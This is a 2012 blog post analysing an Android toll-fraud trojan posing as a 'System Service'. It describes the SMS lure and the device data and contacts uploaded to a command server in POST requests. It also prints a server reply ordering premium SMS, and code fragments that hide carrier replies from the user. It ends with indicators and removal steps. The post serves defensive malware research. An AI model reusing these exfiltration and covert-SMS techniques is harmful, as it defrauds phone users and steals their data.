Tuesday, December 25, 2012

Trojan.Rus.SMS."SystemSecurity" - Toll Fraud / ConnectSMS

Santa, aka DarkK3y, brought a new present.
Please read the malware report below. If you have any comments for the author, please email me and I will send him or get him to contact you.

Download. Email me if you need the password. 
Sample and Research credit: DarkK3y

DarkK3y / dark_k3y

=== Summary of the analysis ===

This malware sample was recieved by SMS message with some web link inside. Malware seems to be Toll Fraud malware (according to Lookout Mobile Security classification). Middle-user inter-action required to infect mobile device -- user need to click link and install apk-file downloaded from it. The installation package requires many security permissions to run (see Characteristics section). After installation, "System Service" ( appears on the device. It loads on boot and make hooks on sms receiver service (with the greatest priority). Also, it uses alarm service to schedule periodic (3 mins and more) runs. Each run (except first) the SMS to the payed service sent. On the first run, information about payed service (SMS number and code) and sms filter (which SMS should be dropped and don't be showed to user) is downloaded from CnC server; OS information, IMEI, IMSI and user contact list is uploaded to CnC server. Possibly, the user contact list phone numbers are used by cnc server for further malware spread, by sending sms'es to them. Currently, malware seems to be undetectable by Norton Mobile Antivirus and some other antimalware mobile tools. It is only detected by heuristic scan methods (possibly, because of requiring too much security priviliges).

=== Identification ===

* Sample characteristics

An APK file, usually named mms475843.apk (see file [2]):

8597c6e7e334bb3ace0502ff9957b7de 32661 mms475843.apk

Android package name:, after infection, malware is stored in /data/app:
root@android:/data/app # ls -l
-rw-r--r-- system   system      32661 2012-12-23 12:10

When device is infected, it contains "System Service" application in the apps list with old-style Android icon (see fig [2]).

* AV Detection

According to VirusTotals analysis (, sample is only detected
with Kaspersky Engine Heuristic Filter and classified as HEUR:Trojan-SMS.AndroidOS.Stealer.a and first seen with VirusTotal 2012-12-23 12:33:33 UTC (first submission date).

=== Characteristics ===

* Spreading

Requires middle-user inter-action, to install application recieved from "". User recieves this link in the
SMS message with text "Вам пришло MMS с фотографиями, для просмотра нажмите"" (Rus) (In Eng: You have recieved MMS with photos, click on to view). After clicking the link, if the user uses mobile User-Agent, he will be forwarded to If user installs the downloaded apk file, his device will be infected.

Further target determination of malware spreading server is made by analyzing user contacts list, which sent by malware to the CnC server on the first run.

* Leaking data

Following information will be extracted from user and system databases: OS type, IMEI, IMSI and user contacts list in XML-format.

* Interacting with the attacker

On the first run, OS, IMEI, IMSI and contact list information is packed into POST-query and sent to (see [3] for request details). On the next runs, only IMEI, IMSI and OS type will be sent to connect.php. (see behavioral section for more details).
Malware recieves from attacker a XML-file with timestamp, sms phone number, code and service operators phone numbers.

=== Dependencies ===

This sample succesfully runs on any Android version from 2.1.x to 4.2.x, so it covers the most modern Android devices.

Malware need following security permissions for successfull operation:
 - android.permission.INTERNET
 - android.permission.RECEIVE_BOOT_COMPLETED
 - android.permission.READ_PHONE_STATE
 - android.permission.RECEIVE_SMS
 - android.permission.READ_CONTACTS
 - android.permission.SEND_SMS
 - android.permission.WRITE_EXTERNAL_STORAGE

=== Behavioral and code analysis findings ===

After installation, system service .AutorunBroadcastReceiver is registered. This service is running on events of system boot and phone state change. Also, it schedules SystemService class for periodic run with AlarmManager engine. The next task run (for the first run) is defined in SmsApplication.settings.saved.nextTimeConnection and calculated with following code in SmsApplication.smalli (see [4]):

.line 87
    sget-object v7, Lcom/android/systemsecurity/SmsApplication;->settings:Lcom/android/systemsecurity/Settings;

    iget-object v7, v7, Lcom/android/systemsecurity/Settings;->saved:Lcom/android/systemsecurity/SettingsSet;

    invoke-static {}, Ljava/lang/System;->currentTimeMillis()J

    move-result-wide v8

    sget v10, Lcom/android/systemsecurity/Settings;->MINUTE:I

    mul-int/lit8 v10, v10, 0x3

    int-to-long v10, v10

    add-long/2addr v8, v10

    iput-wide v8, v7, Lcom/android/systemsecurity/SettingsSet;->nextTimeConnection:J

So, the next time is is 3 minutes. Also, on the first run IMEI, IMSI, device information is collected from device, packed into XML and sending as a POST query to The example query can look as:

POST /connect.php HTTP/1.1
Content-Type: multipart/form-data; boundary=AaB03x
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.2; sdk Build/JB_MR1)
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 514

Content-Disposition: form-data; name="imei"

Content-Disposition: form-data; name="imsi"

Content-Disposition: form-data; name="os"

Content-Disposition: form-data; name="contacts"

Content-Disposition: form-data; name="FILE"; filename="contacts.xml"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary

<?xml version='1.0' encoding='UTF-8' standalone='yes' ?><numbers />

The following operations are done by sendContactsToServer functions of SmsApplication.smalli.

On the second run of the service, only imei/imsi and some device information will be sent to CnC server:

POST /connect.php HTTP/1.1
Content-Length: 78
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)


In response, malware will recieve and XML-file:

<?xml version="1.0" encoding="UTF-8"?>
<response><time>16530325122012</time><sms delay="0"><send number="1141" text="370419" rcoderxp="" rcodegrp="0" rnumberrxp="" rnumbergrp="0"/></sms><filters><delete number="1141" text="*"> </delete></filters><smscfs><smscf value="9126313431"/><smscf value="9184330000"/><smscf value="9139869990"/><smscf value="9104999109"/><smscf value="9147991000"/><smscf value="9168999100"/><smscf value="9168960220"/><smscf value="9112009993"/><smscf value="9107459999"/><smscf value="9171002003"/><smscf value="9262909090"/><smscf value="9262909080"/><smscf value="9219909090"/><smscf value="8129600096"/><smscf value="9129600096"/><smscf value="9206909090"/><smscf value="9282000002"/><smscf value="9289900028"/><smscf value="9272909090"/><smscf value="9222909090"/><smscf value="9202909090"/><smscf value="9232909090"/><smscf value="9242000690"/><smscf value="9242909090"/><smscf value="9037011111"/></smscfs></response>

This file contains payed service number (1141) and code (370419). Immediately after it, sms is sent to 1141. This SMS isn't stored in the SMS archive or in any other place. XML filters and smscf sections are used to fill out Settings.smscFilters vector with payed service and provider service phone numbers. This information will be used in SmsReciver class later. After it, service goes to sleep for a while.

SmsReciver class is preventing sms, recieved from numbers stored in Settings.smscFilters, from being viewed by device user. This is done by onReceive method, for example by code (see [5]):

    if (SmsApplication.isServiceNumber(localSmsMessage.getOriginatingAddress()))
    if (SmsApplication.settings.isDeleteMessage(localSmsMessage.getOriginatingAddress(), localSmsMessage.getMessageBody()))

Data and setting are stored in messages.db (database of skipped messages) and settings file (stores the last run timestamp).

=== Incident recommendations ===

Host-based indicators:

1. ("System Security") application package installed.
2. (md5sum: 8597c6e7e334bb3ace0502ff9957b7de, 32661) in /data/apps
3. "System Service" application in the Apps list (see figure [2])

Network-based indicators:

1. HTTP POST-queries to
2. HTTP POST-queries to

Removing the infection:

- Removing Service package and data with application manager completely cleans the system from malware.

=== Supporting materials ===

1, file: mms475843.apk, original trojan installer (md5sum: 8597c6e7e334bb3ace0502ff9957b7de)
2, figure: appslist.png, screen with installed malware in the application list (md5sum: 28a9dab433247252327fea7514811cd3)
3, file: requests.txt, burp suite query interception (md5sum: b3f019f4f8801810d2b1bb4d39017f8e)
4, file: SmsApplication.smali, smalli disassemble of SmsApplication.class (md5sum: 0b72945f71c5a3477af18a8a9a9eaad9)
5, file:, java disassemble of SmsReciver.class (md5sum: d7bb04e9ef0a47477d8bc5ac84c92de8)

1 comment:

  1. Hi Mila
    I have already sent you an e-mail to have lasts malwares.

    Thank you.